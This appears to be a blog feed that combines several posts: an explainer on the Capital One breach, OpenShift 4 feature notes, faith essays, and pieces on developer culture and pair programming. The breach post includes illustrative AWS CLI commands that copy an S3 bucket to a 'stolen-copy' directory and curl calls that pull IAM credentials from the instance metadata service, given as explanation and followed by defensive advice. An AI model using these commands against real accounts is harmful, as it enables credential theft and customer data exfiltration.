Author: Josh

What Happened at Capital One?


There have been many words written about the Capital One breach – but a lot of them didn’t explain what actually happened. We care a lot about security in general, and cloud security in particular, so Josh set out to find some words that did explain what happened:

The Krebs article might be the best for this. However, as far as we could tell, no one’s tackled it from a “what can enterprises learn from this?” standpoint, and…that’s what we really care about.

TL;DR: The Event

A hacker named Erratic, who was a former AWS employee, took the following actions:

  1. Owned the Web Application Firewall (WAF) on Capital One’s Amazon Web Services (AWS) Virtual Private Cloud (VPC)
  2. Used the credentials of the WAF to connect to other AWS resources in the VPC, including their storage (S3 buckets)
  3. Synced (copied) the object store to her own storage
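For the curious, here’s a hedged sketch of what those three steps might look like with the AWS CLI. Every name here is hypothetical, Capital One hasn’t published the exact commands, and this obviously requires credentials an attacker shouldn’t have – so treat it as illustration, not instruction:

```shell
# 1. On the compromised WAF host: confirm which IAM role the stolen
#    credentials belong to
aws sts get-caller-identity

# 2. The WAF's role turns out to be allowed to list and read S3
aws s3 ls

# 3. "Sync" (copy) a bucket's contents out to attacker-controlled storage
#    (bucket name is made up)
aws s3 sync s3://hypothetical-customer-data-bucket ./stolen-copy
```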

“With this one trick, you can get 100M Credit Card Numbers! The secret THEY don’t want you to know!”
– Best ClickBait Ad Ever

ELI5: The Event

So…there’s a lot about the mechanics of this that’s unclear. But we can explain what seems to be widely accepted as fact. First, some definitions:

  • A Web Application Firewall (WAF) sits at an entry point into a system – it isn’t intended to be a way in, though; it’s intended to be a layer of defense that inspects and filters traffic.
  • AWS is Amazon’s public cloud.
  • A virtual private cloud (VPC) is a cordoned-off part of a cloud – so, it was an area of AWS that was specifically for Capital One.

So…

  1. Somehow the hacker Erratic was able to log in to one of Capital One’s WAFs.
  2. From there, she got to their storage objects that represented information about people – specifically, people who had used the business credit card application…application. Overloaded words are the best!
  3. Finally, she copied those storage objects that represented people to her own area of AWS – like copying a file from someone else’s Google Drive into your Google Drive.

Questions Outstanding

…there are a lot.

It’s not clear how Erratic did #1, logging in to the WAF. The most likely answer is that the username/password wasn’t complicated enough – maybe even the default of admin/admin. But there are other possibilities, and if Capital One has disclosed this piece, we couldn’t find it.

There are a few ways step #2 could have happened – the WAF could have already had access to all of the storage objects, or Erratic could have given the WAF direct access to the storage objects. The J Cole Morrison article above explained one possible scenario: Amazon IAM could have been used to take advantage of the fact that she was already in the WAF and then extended the default trust of “well, you’re in the WAF, so okay” – security people call this a “pivot”.
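One commonly described pivot path in AWS (we’re not claiming it’s confirmed for this incident) goes through the EC2 instance metadata service: once you’re on an instance, you can ask it for temporary credentials for the IAM role attached to that instance – no password required. Roughly:

```shell
# From inside a compromised instance – the metadata service is only
# reachable locally, so this is not runnable from the outside.
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# (returns the name of the IAM role attached to the instance)

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# (returns a temporary AccessKeyId, SecretAccessKey, and session Token,
#  usable against any AWS API that role is allowed to call)
```

That’s exactly the kind of “well, you’re in the WAF, so okay” default trust a pivot relies on.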

Step #3 is basically…copy/paste. There are probably some interesting nuances here, like…if she didn’t give the WAF authority to read the objects, why did the WAF have that authority? What business use case would require giving an access point read access to an entire store of customer data? Also, she would have had to give something access to write to her own AWS space, at least temporarily.

The Pain: $100M-$150M

The Capital One press release stated that this incident will “generate incremental costs of approximately $100 to $150 million in 2019.” Capital One was one of the earliest companies to go to AWS/the cloud, and they made a lot of noise about it – here, and here. Explaining technology success is one of our favorite things, but publicizing your backing infrastructure has trade-offs compared to keeping it quiet.

This has led to egg on AWS’s and Capital One’s faces, which is unfortunate, because this really doesn’t have much to specifically do with AWS or clouds in general….

…or does it?
– Not Intended to be ClickBait

Clouds in General

This isn’t the first AWS data breach (see end of the blog for a list of others). The list is not small, unfortunately.

Please raise your hand if you’re sure you haven’t been hacked.

We’re gonna say this is partially because AWS is the biggest, been around the longest, and had to figure out hyperscale stuffs without anyone to copy from because they were the first.

But still… yikes.

A big part of this is that Amazon makes things super easy. So easy a caveman could do it, right? And…that’s the trick. It’s super easy to type in a credit card (or even an AWS gift card, I (Josh) have one they gave out at a trade show) and spin up some storage and compute. Unfortunately, it isn’t super easy to spin up security tailored to clouds.

We used to have to wait for infrastructure teams in our data centers to (hopefully) handle the security for us. They’d put our request in a queue, and get to it a week later…then they’d ask the storage admins and VM admins for some data and some compute, and that request would go into a queue…and then, several steps later, the firewall admins would get involved…but doggone it, eventually the pros would secure things like they were trained.

VM-based infrastructure has been around a long time, and the kinks have been worked out. Cloud infrastructure is newer, and exponentially faster to use – that’s one of the biggest appeals. Unfortunately, because it’s newer and because it’s so fast, kinks still exist – and one of the biggest is how to make it secure without slowing down the people using it.

Clouds are not all insecure, the sky is not falling – but they do require more deliberate attention to security than perhaps we’re used to in most of IT.

Takeaways and Recommendations

With Infrastructure as a Service that’s as fast and easy as cloud-based, it’s clear that there are often times when the right security-aware folks are not involved. It’s extremely easy to get going with platforms like these, which is…kind of the point. Simply put, you can get insecure systems faster and easier than you can get secure systems – for now, anyway. The industry knows this, and is trying to make it better.

Until security catches up to the speed of IaaS, companies need people who can secure their systems to be involved in setting up new platforms, and setting up best practices for their use. The balance point of that is not removing too much of the speed and agility gains of advances like IaaS because of security – ideally security should be something that everyone agrees is worth the trade.

So…after all of that, here are some recommendations:

  1. Single layers of security are not enough. You need Defense in Depth, and vital areas like customer data need to be strongly protected regardless of the platform trying to access them.
  2. Security practices and implementations should be transparent, at least within a company, and questions should be welcomed and encouraged. Open culture helps with security, too.
  3. Security should be automated as much as possible, and that automation should also be transparent (infrastructure as code).
  4. Enterprises need to choose platforms that are secure, that have people dedicated to the security of that platform as their job.
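As a sketch of #1 and #3 together: in AWS, defense in depth for an S3 bucket can itself be expressed as code – for example, a bucket policy that denies everything except one narrowly scoped role. All names and the account number below are hypothetical; treat this as an illustration of the idea, not a drop-in policy:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAllExceptDataReaderRole",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::hypothetical-customer-data",
        "arn:aws:s3:::hypothetical-customer-data/*"
      ],
      "Condition": {
        "StringNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::111122223333:role/customer-data-reader"
        }
      }
    }
  ]
}
```

With something like this in place, even a compromised WAF role can’t read the bucket – the data layer has its own defense, regardless of which platform is asking.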

Other AWS Data Breaches

We’re on Hiatus for a bit – but for a REALLY GOOD REASON.


We really love this blog. We started it almost exactly 6 months ago and it means a ton to both of us. We started with two posts a week – and then Josh started a new job. We downshifted to one post a week – and then Laine got a new job. We’ve managed to keep on keepin’ on at one post a week since then, which… well, we really love this blog.

One of the first things we ever did that made us sit up and realize that maybe we made a seriously effective team was give a nerd presentation – we talked about feature toggles as an architectural concept. A few months after that, we went to UberConf in Denver. That was Laine’s first IT conference, and we had a blast. That’s a pretty good “God does stuff everywhere” story, which we should probably tell at some point…

After that conference, as we adjusted back to normal life, we talked about how seriously amazingly cool it would be to give nerd presentations at a nerd conference of that level – national, and with nerd-famous people like Mark Richards and Neal Ford. Josh definitely fanboy’d when Mark Richards included him in a demo in a presentation. We also befriended one of the speakers on the tour, who lives nowhere near us. We filed away the plan to some day speak at national nerd conferences in general, and at UberConf specifically, in the “haha, sure, that might happen some day” file.

We called this a goal, but…it was a dream. It was a dream in the way that little kids gleefully dream about being an astronaut when they grow up.

Laine was off work for 6 months. Again, another story for another time. But while she was off work, we started to apply to speak at conferences. Josh’s new job was friendly to the idea, Laine had no job, it was something to think about, so…we sort of figured why not.

We applied to speak at O’Reilly’s Open Source & Software Convention (OSCON), who was having a themed Inner Source day this year. Once Laine understood what on Earth “inner source” meant, we were sort of like, “hey it is us and one of the things we love the most!!” We submitted two talks.

We also started conversations about getting onto a No Fluff Just Stuff stop, semi-local – NFJS organizes UberConf along with a lot of other regional conferences, all throughout the year. The other major conference they organize is ArchConf, in December – which was also on our Nerd/Astronaut Dreams Bucket List.

And then, on a Friday afternoon, we found out the following:

  1. One of our talks was accepted for OSCON.
  2. One of the speakers for UberConf had to drop out, there were some spots open, and we could have them if we wanted.
  3. We were also officially in for Tech Leader Summit and ArchConf.

God does weird, wonderful, lavish, unexpectedly awesome stuff

…you mentioned a hiatus?

Yes! We did.

OSCON and UberConf are the same week, the week of July 15th. We got lucky (jklol pretty sure it was God doing more awesome stuff) and our talk at OSCON is that Tuesday, and our talks (4!!) at UberConf are Wednesday and Friday. So…we decided to do both conferences.

J: Should we do both?
L: Are we really crazy enough to try that? :thinking:
Us: Yep!!

We’re getting ready for those talks now. We are both extremely dedicated, prolific workers, but even we have limits. We have several posts in varying stages of done, but the kinds of thing we write require focus and attention and time and soul – and we pretty much only know how to make any content we produce in that same way.

“A man’s got to know his limitations.” – Harry Callahan, Magnum Force

We will be back. We have so many thoughts and feels and did we mention we love this blog?

Logistics

These are the descriptions and scheduling of our talks:

Please come say hello if you’ll be at either OSCON or UberConf. (If you are not attending and would like to, we have discount codes!) We love these topics, we love talking about them, and we are so stupid excited to be doing this.

Also, we will have stickers. We bought binders for them and everything. 

Why Thanos is the Best Avenger


We’re (hopefully) taught some important things as children:

  • you can do anything you set your mind to, so aim high
  • we’re all representatives of humanity, and being part of humanity comes with some responsibilities – vote, take care of the environment, take care of each other, etc
  • do what you think is right, even if all your friends are doing what you think is wrong

[Spoilers ahead, for Avengers: Infinity War and Avengers: Endgame]


Souls are Like Garages


On Garages: a Semi-Rant

The box on the lower left is happy, if upside down.

A pet peeve of mine (Josh) is messy garages. I was ranting about this to Laine the other day, and an epiphany hit me.

Souls are like garages. Keep yours cleaned the f&$# out.

We are not naturally highly organized people. This is not a rant/post proposing that you itemize, alphabetize, and categorize every one of your possessions, towards living a better life. This is not that kind of post.

At least this person made an alley through their stuff…

However, your garage is made for a specific purpose. We both live in Michigan. It gets cold here. If you have to park your car on the street, or in your driveway, your car gets covered in frost that has to be scraped off with one of the most annoying tools ever created. It also gets covered in snow when it inevitably snows, and regardless of snow or frost, it’s cold in the mornings.

Your driveway is also the safest place for your friends and buddies to park when they come visit you – but if you have to park in the driveway, they have to park in the street.

If you park in a garage, if you use the garage for its intended purpose, you avoid all of this pain.

Garages are for parking. They shouldn’t be filled with cruft and detritus that you don’t need, you haven’t used in years, and you have no real plans to even think about.


Quick Hits: Coolest New Stuff In OpenShift 4


We talked in a previous post about neat stuff that was coming up in OpenShift. We wanted to follow up now that more information is available and 4.1 is GA and quickly break down some of the neatest stuff.

OpenShift 4 is the major version that aims to make Kubernetes the standard platform: it provides features that let the majority of enterprises build and run the majority of their applications on an open, agile, future-ready platform.

OpenShift 4 crosses the chasm from early adopters to the standard platform for Kubernetes.

Istio (Service Mesh)

What is it: Networking upgrade for OpenShift Applications

Status: Tech Preview as of 4.1

How does it work: Injects a container sidecar to monitor (mostly to say who’s calling who, and how much), secure, and manage traffic. 

Key Features:

  • Transaction tracing, traffic graphs, full-transaction performance monitoring
  • Traffic (routing) control
  • Rate limiting, circuit breaking

Big Talking Point: OpenShift Service Mesh makes managing all of the services you’re building visual and clear.
Business Use Case: Enterprises looking to get visibility into their microservices – including current AppDynamics and Dynatrace customers.
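As a taste of the traffic-control piece, a canary-style Istio VirtualService looks something like this (the service names and the 90/10 split are made up for illustration):

```yaml
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: reviews
spec:
  hosts:
  - reviews
  http:
  - route:
    - destination:        # 90% of traffic stays on the stable version
        host: reviews
        subset: v1
      weight: 90
    - destination:        # 10% canaries onto the new version
        host: reviews
        subset: v2
      weight: 10
```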

Red Hat CodeReady

What is it: Containerized Application Development Environment. Tagline is “cloud-native development.”

Key Features:

  • Single-Click Modern IDE
  • Tight integration with OpenShift
  • Debugging containers on OpenShift is a nice experience

Business Use Case: Enterprises with poor developer IDEs will appreciate CodeReady.

Competitors:  IntelliJ and VSCode

FaaS 

What is it: FaaS/Serverless is an even easier and more restricted architecture than containers or PaaS.

Serverless is an alternative to containers. Applications that would be a good fit in a simple container are an easy fit for serverless.

Knative

What is it: Kubernetes-based serverless “Application Easy Button” – just write code, forget about packaging. We talked about it in more detail here.

Key Features:

  • An open standard for serverless.
  • Build, scale, and trigger applications automatically

Big Talking Point: OpenShift 4’s Knative solution makes building, running, scaling, and starting applications even simpler.
Business Use Case: Enterprises looking to turn their long-running (overnight) batch streams into real-time integrations should use Knative and AMQ Streams on OCP.

Competitors: AWS Lambda, Azure Serverless, Google Cloud Functions. Knative provides this functionality without vendor lock-in from a single cloud provider.
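For flavor, a minimal Knative Service really is about this small (the image and names are borrowed from the public Knative samples – a sketch, not a recommendation):

```yaml
apiVersion: serving.knative.dev/v1
kind: Service
metadata:
  name: hello
spec:
  template:
    spec:
      containers:
      - image: gcr.io/knative-samples/helloworld-go  # your code, packaged once
        env:
        - name: TARGET
          value: "World"
```

Knative handles routing, scale-up on traffic, and scale-to-zero when idle – that’s the “Application Easy Button” part.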

The Operator Framework

What is it: intelligent automation that can manage an application by defining its proper state and automating complicated application operations using best practices.

Key Features:

  • Kubernetes-native application management
  • Choice of automation: Go, Ansible, Helm
  • Packaged with a Kubernetes application

Business Use Case: managing stateful applications like Kafka and databases – however, new use cases show up all the time, such as managing the Kubernetes cluster itself (machine operators)

Big Talking Point: Operators make managing complex applications in Kubernetes much easier, turning industry-standard practices into automation.
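The day-to-day experience is declaring the state you want and letting the operator reconcile toward it. For instance, with a Kafka operator like Strimzi, a three-broker cluster is just a custom resource (a sketch following the Strimzi quickstart examples – field names may vary by version):

```yaml
apiVersion: kafka.strimzi.io/v1beta1
kind: Kafka
metadata:
  name: my-cluster
spec:
  kafka:
    replicas: 3          # the operator creates, heals, and upgrades the brokers
    storage:
      type: ephemeral
  zookeeper:
    replicas: 3
    storage:
      type: ephemeral
  entityOperator:
    topicOperator: {}
```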

KubeVirt

What is it: Kubernetes-native virtualization. Run VMs on Kubernetes. Basically, this is VMware for K8s.

How does it work: leverage open source virtualization technology inside a container to run VMs. 

Features: 

  • Run Windows or Linux VMs on OpenShift
  • Manage complicated, hard-to-containerize applications alongside the containerized applications that integrate with them

Business Use Case: ditch proprietary VM platforms and run your containers and VMs on one standard, open platform
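A KubeVirt VM is declared like any other Kubernetes object. The sketch below is adapted from the KubeVirt demo examples (the image and sizes are illustrative):

```yaml
apiVersion: kubevirt.io/v1alpha3
kind: VirtualMachine
metadata:
  name: demo-vm
spec:
  running: false              # start/stop by patching this field (or via virtctl)
  template:
    spec:
      domain:
        devices:
          disks:
          - name: rootdisk
            disk:
              bus: virtio
        resources:
          requests:
            memory: 64M
      volumes:
      - name: rootdisk
        containerDisk:        # VM image shipped inside a container image
          image: kubevirt/cirros-container-disk-demo
```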

What else is neat in OpenShift 4

Cluster Admin is so much easier: 

  • Fully-automated cluster spin-up: AWS install in less than an hour
  • Push-button updates
  • Immutable Infrastructure: RHEL CoreOS nodes are immutable and extremely strong from a security standpoint
  • Nodes as cattle, not pets: automatic scaling and healing
  • Cluster can automatically add nodes as load increases

Stuff We’d Like to Get Deeper With

There’s a lot more coming with OpenShift that we’d like to get hands-on time with:

  • Windows Containers
  • OpenShift Cluster Management at cloud.redhat.com
  • Universal Base Image: https://www.redhat.com/en/blog/introducing-red-hat-universal-base-image
  • Quay and Clair

OpenShift: Still the Best at What it Always was Best At

OpenShift is still the platform we know and love.

  • Secure Kubernetes: SELinux helps prevent security problems like the runc vulnerability
  • Fully backed by Red Hat, which will be even more stable and well-funded after the IBM acquisition
  • Enabling Digital Transformation: Containers are still the best way to transform IT, and Kubernetes is the best way to enable DevOps and Continuous Delivery
  • Open Hybrid Strategy: Vendor Lock-in sucks. Open standards and great partnerships.

It was recently announced that more than 1000 enterprises across all industries are running OpenShift. 

Sacrifice Done Well


“I am the good shepherd. The good shepherd lays down his life for the sheep.” John 10:11

The Bible talks about sacrifice a lot. Sacrificing for each other, sacrificing to serve God. The Gospel, the most important story arc in the Bible, is in part about Jesus’ ultimate sacrifice – his death, yes, but more his complete and utter separation from God when he needed God the most. Unfortunately, over the past 2000 years, the definition of sacrifice has been broken to the point where it’s used to do more harm than good.


Creating Monsters and Utopias


I’m not the bad guy. Right??

There’s a relatively simple list of things that most people want. We want to feel important to our world. We want to be good, kind people – people who aren’t the bad guy, people who deserve good.

We want the freedom to choose what makes us happy, and to find things that make us feel fulfilled. We want to be able to choose the things that fill our souls to the brim.

Conflict

But the people around us don’t always want those things for us. They want us to work in their best interests, and they sometimes get hurt when we instead do what we want or need. When they get hurt, they try to control us into changing. They try to make us feel bad (or good) until we do change, until we do things that don’t make us happy or things that will hurt us – and if that doesn’t work, they decide that we must be an enemy and they begin to treat us accordingly.

Resolution

False Realities

I (Josh) didn’t like reality. Reality kept showing me that people may not always react favorably to the things I want or need – and I was scared of what might happen if I continued to fight for my right to those things. Ultimately, I was scared that they might leave if I continued to take care of myself.

I didn’t value my own soul enough to believe that it was worth taking care of, except…I kind of did. So in response, as a way to feel justified in fighting for my soul, I created alternate versions of people. I made people into monsters – monsters who manipulated me for their own selfish purposes. I saw them as willing to destroy me in order to get what they wanted. And since they were evil, I didn’t have to do what they said – I had the right to take care of myself, and I also had the right to control them into being not evil.

False Realities Believe in the Right to Protect Myself

Some of these people were not trying to manipulate me. I would see people as evil who were just trying to help me face my fears – deeply hidden, pressed down, and blocked away – and I would see people as evil who would shove me at God when I didn’t want to do that.

But…some of the people I turned into monsters were trying to manipulate me. These people weren’t evil though, they were just…afraid. They were afraid of the same thing I was, actually, that if they couldn’t control me or our relationship, I would leave. In their fear, they were trying to destroy me, but sort of as a…byproduct. They tried to destroy me to make me safe for them to love.

What I struggled with was the simple fact that I’m supposed to do what protects my soul, what nourishes and cares for it, and what keeps it whole so that it can serve God to the best of its ability. I don’t actually need to see evil motives in other people in order to do so.

I don’t need to see evil motives in other people in order to protect my soul.

Three Realities

“Hopeless.”

I realized that I believed in at least three realities:

  1. the utopia, a perfect place, without fear or risk, that I had long ago lost all hope of getting to. I was angry at God, because I assumed he was choosing to keep me away – so really it was his fault that I couldn’t get there.
  2. the horror, where the people I loved were evil and trying to destroy me, and where nothing would ever ever be good – where not even God could fix things.
  3. actual reality, where things were mostly good, but not my previous understanding of ideal.

If life was intended to be the utopia, then I had seriously messed something up at some point, despite always trying as hard as I could to do and be what God wanted from me. If life was the horror, I thought I could (and should) seize control from God and set my own destiny – but it turns out that seizing control from God never works. I tried, and tried, and tried with all my soul and strength to take control and make the horror world less awful. It was a terrible process, but I realized, eventually, that it was impossible. Also, thankfully, that it wasn’t even reality.

That left only actual reality – and if actual reality was all that was available for me to work with, I was really scared that my life would never be what I wanted it to be.

Oh good, not just me then…

We realized that other people do this too – we saw it happening, we had it happen to us as the objects, and we were confused and hurt when people saw us as demons or monsters out to destroy them. But…then we realized that these people were just really scared. They wanted to control us into doing the things that would make them feel less scared – which we weren’t willing to do. The inability to control us made them more scared, which led to more attempts at control, and…

Scared people do crazy things.

It gave us a lot of new empathy actually. We realized that most of the people who ever did a bad thing to another person…they probably just created a false reality. Every mugger was just keeping himself fed and giving himself the life he deserved – it was only fair, only what he deserved from the people and world around him. Every despot was just preserving freedom or safety for his people – whatever meager amount could be eked out from this cold, dark world. “Because even meager safety in my kingdom is better than the horror of living under their regime.”

At this point, we’re pretty sure that even truly evil people create their own moral justification via false realities. Hitler believed in what he was doing so hard that he convinced thousands of people that he was right – his opinions were awful, and fueled by fear. But he was convincing. He was sure.

Scared people do crazy things.

What’s the answer?

What’s always the answer?

Faith. Trust.

I had to learn all over again how to trust. I had to trust that God loves me – and while he disciplines, he does not punish. I have already been forgiven, so…there isn’t anything to punish.

I had to be willing to see the people I loved, which I had been avoiding in case I was about to see them walk away from me. Once I saw them, I knew that they were not trying to destroy me – or if they were, I didn’t have to let them.

Once I could trust God, and remember that he loves me and wasn’t trying to punish me, it was clear(er) that the utopia probably didn’t exist. And once I could see the people I loved again, and I trusted that they were not trying to destroy me, it was clear(er) that the horror probably didn’t exist either. That left learning how to exist in actual reality, which…is an entirely other blog post.

Developers Drive Organizational Success


Developers are a huge part of organizational success. Way back in 2013, Stephen O’Grady said that developers are “kingmakers” – so this idea is not new.

As a society, we’re increasingly connected – to each other, and to the businesses we choose. Those connections, and those businesses, run on software. We’ve moved to hitting a website or using an app to do business instead of picking up the phone – and even if we call a company, the person we’re talking to is definitely using software on our behalf.

Pikachu, I choose YOU.

We said that we’re more connected to the businesses we choose – and we do have significantly more choice about which businesses we use. The business’s software is part of how we make that choice – if it’s engaging and easy to understand and use, then working with the business as a customer is easier. If working with a company is easier, we’re more likely to go back. If, on the other hand, the website or app doesn’t work, or it’s confusing, we’re more likely to use one of the many alternatives that the internet allows for. Basically…

Customer service is characterized, facilitated, and proven by a company’s software.

Software driving a business’s success is also not a new idea – in fact, it’s the core concept behind the ideas of digital transformation and digital disruption. If we accept that it’s true, the next thing to consider is how to make software successful.

Software’s success is determined by how well it’s designed, built, and maintained. Great software can’t be built by mediocre developers using mediocre architecture, running on and designed for mediocre platforms. So…that means that businesses really need to know, “how do we enable our people to create amazing and engaging software?”

Software drives a business’s success – and software’s success is driven by how well it’s designed, built, and maintained.

How to Enable Developers – Technology

Enabling via Architecture

What do developers need to be successful? Well…they need several things, but first they need to understand the rules of the software they’re building: what is it intended to do? How does it communicate with other software? What APIs, services are available? Where is data permanently stored? What languages can I write it in?

These questions are all architecture. The answers should be clear and consistent, and they should allow for flexibility in implementation. They should also allow for development speed and developer familiarity – usually by using modern, standard technology with lots of community support.

Open source technology is usually the best for enabling happy developers. The communities around open source development are strong, and they’re full of skilled, passionate people who love the technology they’re contributing to – and they contribute to technology that they would love to use. Spring (Java framework), NodeJS (JavaScript run time environment), Ruby (general purpose, object-oriented programming language, like C++ and Java), MongoDB (document database), and Kafka (pub/sub messaging) are all examples of great open source architecture ingredients that developers actually like to use.

Enabling via Tools

Developers need to know what tools are at their disposal to develop, test, and run their software. They also need those tools to be kept up to date – via updates, or via new tools that accomplish what they need better, faster, or less painfully.

They need an IDE they understand – and enjoy using (we like IntelliJ, but nerd tools are something like holy flame wars, so…you do you. Laine quite happily made entire web pages in Notepad++ as a teenager, soooo…). Think about your office, or the primary tool you use to do your job – that’s an IDE for a developer. It needs to be comfortable.

They need code repositories (Git-based, Bitbucket is great), and security scanning (Sonarqube, and a dependency scanner), and test automation, ideally built in as early in the process of development as possible. They need fast build tools so they aren’t forced to stop everything and wait in order to even see if a change works (Maven, or Gradle), and automation where and how it makes sense, for builds, or deployment, or…whatever (Jenkins, or Ansible).
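To make that concrete, here’s what a minimal pipeline tying a few of those tools together might look like as a declarative Jenkinsfile. The stage names, Maven goals, and SonarQube step are illustrative assumptions, not a prescription:

```groovy
pipeline {
    agent any
    stages {
        stage('Build & Test') {
            steps {
                // Fast feedback: compile and run unit tests in one shot
                sh 'mvn -B clean verify'
            }
        }
        stage('Code Quality') {
            steps {
                // Push analysis to a SonarQube server (assumed configured)
                sh 'mvn -B sonar:sonar'
            }
        }
        stage('Deploy') {
            steps {
                // Hand the artifact to the platform, e.g. an OpenShift build
                // ("my-app" is a hypothetical build config name)
                sh 'oc start-build my-app --from-dir=target --follow'
            }
        }
    }
}
```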

They need a good platform on which to run their software, ideally one that gives them the ability to self-serve…well, servers, so they don’t have to wait a week or a month or even a day to move forward once their code is ready (OpenShift).

Enabling Developers – Culture

Enabling via Processes

Confusing release processes, slow purchase processes, unclear approval processes for free tools – these are all processes that choke innovation, and worse, choke a developer’s ability to even execute. To enable developers, a business actually wants them to have some freedom to stretch out – to use their skills, and to discover new skills.

Independent of IT processes, there are also HR processes – like rules that dictate how many hours must be worked, or rules that don’t “count” any work done from anywhere other than on site. IT is an art, not a formula – IT brains are constantly designing and adapting and connecting information – and then refining those designs, adaptations, and connections. Expecting, and behaving as though, X developers = Y lines of code, and Y lines of code = Z business priorities delivered causes pain and actually slows developers down.

IT is an art, not a formula.

So…there are bad processes that, if stopped or lessened or sometimes just explained will enable developers. There are also good processes – giving them a comfortable means to communicate with each other (Slack! <3), or encouraging easy ways to learn and grow and try things without repercussions.

Enabling via Support

Application developers need support – people backing them up and fighting for them, and supporting the tools they need to do their jobs in the least painful way possible. They need Architects setting architecture standards, and making sure that people talk to each other and agree about how all of the software into, out of, and within a company will interact. They need Platform Architects (sometimes called Enterprise Architects or Infrastructure Architects) setting up their platforms and making sure their apps run, and giving them access to get clear, fast feedback about their applications from those platforms.

They need people who will cut through any cultural red tape to get them the information and tools and good processes that they need. They need HR managers who support their career and their personal and professional growth. They need technical leadership who teach and advocate – new architecture patterns, how to actually use new tools, what works and definitely does NOT work between teams and in other companies. They need people explaining how to use the tools provided and giving them permission to adapt the “how” in such a way that the tool is not onerous.

They also need each other – people who are native speakers of their language, who are trying to accomplish roughly the same things in the same ways with the same barriers.

Teams Drive Organizational Success

Developers drive organizational success, but they need teams around them – supporting them, and fighting for the processes and tools that will help them be successful.

A healthy ecosystem is vitally important to developer success.

So…it isn’t actually just developers who drive organizational success – it’s teams. Teams centered around development, and enabling that development, but…definitely teams.

Successful businesses have successful software. Successful software is made by enabled developers. However, the truth of the matter is that because we are all so connected, no one exists in a vacuum. Developers need architects, and infrastructure people, and leadership (HR and technical, along with vision setters and vision communicators), and cutters of red tape, and purchasers of tools, and each other to truly be successful.

Our Pair Programming Experience – or, the first time we nerded out together and learned a ton

Pair Programming – What is?

Pair programming is an agile software development technique in which two programmers work together at one workstation. One, the driver, writes code while the other, the observer or navigator, reviews each line of code as it is typed in. The two programmers switch roles frequently. (Wikipedia)

Why explain our experience?

At the end of 2017, we were both OpenShift Architects at our last employer. We were working on integrating the new-to-us platform with the existing processes of the organization – especially the build, deployment, and release processes. Most of the applications on OpenShift would be Java applications, and all Java builds were done with Jenkins. There was a release management tool that was written in-house serving as a middle layer to control deployments and releases.

Build and deployment when we started – mostly to WebSphere on a mainframe, or WebSphere on distributed VMs.

We (the organization) were also in the middle of transitioning from enterprise Jenkins + templates to open source Jenkins + pipelines. There were only a handful of people in the very large IT division who even knew how to write a pipeline – and we took on writing the pipelines (and shared libraries) that would prove out a default implementation of building and releasing to OpenShift. We knew this would be a huge challenge – if done properly, the entire company could run their OpenShift deploys on this pipeline, and it could be improved and grown as more people contributed to it via the internal open source culture that we were building.

While we figured out what to do, the pipeline just went straight from (the new, open source version of) Jenkins to OpenShift. POC FTW!
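To make that proof-of-concept flow concrete, a Jenkins-straight-to-OpenShift pipeline of that era could look something like the following sketch of a declarative Jenkinsfile. This is a hypothetical minimal example, not the actual pipeline or shared libraries we wrote – the stage names, the `myapp` BuildConfig/DeploymentConfig, and the Maven build step are all illustrative assumptions:

```groovy
// Hypothetical minimal Jenkins -> OpenShift (3.x era) pipeline sketch.
// Assumes the Jenkins agent has mvn and a logged-in oc client, and that
// a BuildConfig and DeploymentConfig named "myapp" already exist.
pipeline {
    agent any
    stages {
        stage('Build') {
            steps {
                // Compile and unit test the Java application
                sh 'mvn -B clean package'
            }
        }
        stage('Image Build') {
            steps {
                // Feed the built jar into an OpenShift binary build
                sh 'oc start-build myapp --from-file=target/app.jar --follow'
            }
        }
        stage('Deploy') {
            steps {
                // Trigger a new rollout and wait for it to finish
                sh 'oc rollout latest dc/myapp'
                sh 'oc rollout status dc/myapp'
            }
        }
    }
}
```

With an image change trigger on the DeploymentConfig, the rollout could also happen automatically when the build pushes a new image; the explicit `oc rollout latest` just makes the deploy a visible step in the pipeline.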

We ended up doing this via pair programming – because we work really well together, mostly. However, because we’re both technology nerds and also people/culture nerds, and because pair programming gets some push-back from more traditional organizations, we wrote down the benefits we saw.

I know some stuff, and you know some stuff, but basically we’re both noobs…

We were BOTH the little turtle…

The team Laine was assigned to was the team that oversaw Jenkins administration and the build process, along with the in-house release management tool – but she’d only been on that team for about 4 months. She knew more about Jenkins than Josh, but…not by much.

Josh was the one who spearheaded bringing OpenShift into the company, and so he knew a lot of the theory of automating OpenShift deploys and had a rough idea of what the process as a whole should look like.

…basically, neither of us really knew how to do what we set out to do, and actually we didn’t intend to do something that fell into the realm of pair programming. We just already relied on each other for many things, including understanding and processing information, and we both deeply loved OpenShift and saw its potential for the company we also loved. We were determined to do as much as we possibly could to help it be successful.

What We Actually Did

Mostly our plan was to just…try stuff. We followed the definition of pair programming above some of the time – we took turns writing while the other focused more on review, catching problems, and planning the next steps. This was awesome, because we caught problems early just by keeping an eye on each other’s work – like, “uhh, you spelled ‘deploy’ D-E-P-L-Y, that’s not gonna work…”

Taking turns doing the actual coding also allowed us to churn through research while still doing development. We’re both top-down thinkers, which means that we understood the steps that needed to happen without knowing quite how we would implement each step. With one of us researching while the other was coding, as soon as one coding task was complete, we could more or less start right away on the next. Given the amount of research we had to do, this was huge in speeding us up. It also allowed us to switch up what we were each doing, and not get bogged down in either research or implementation.

Why is Heath Ledger Joker on this? IDK, who cares?? <3

In addition to taking turns coding vs overseeing, we also did a lot of what might be called parallel programming – we worked closely on different aspects of the same problem at the same time. This was also highly effective, but it required us to be very much on the same page about what we were doing. We did this mostly off-hours, via Slack communication, so…it wasn’t always a given that we actually were on the same page.

Despite the communication hijinks, or maybe because of them (it was really funny…), this was probably the most efficient of all of the coding work we did. If we got stuck or didn’t know how to solve a problem, the other could easily figure out how to help because we were already in the code. We also bounced questions and implementation ideas off of each other (efficiently, because we didn’t need to explain the entire project!), so…something like pair solution design.

And again, up there in overall efficiency, was some pair debugging. We could put our heads together to talk through what was broken (aside from typos…), figure out why it was broken, and land more quickly at the right solution to fix it. (See also: Rubber Duck Debugging)

This is where we landed after we did our part. We advised on tweaking the process, helped implement updates where we could, and…got out of the way and let the very talented and enthusiastic contributing developers take over.

Why it was Awesome

(Quotes in this section are from Strengthening the Case for Pair Programming.)

More Efficient

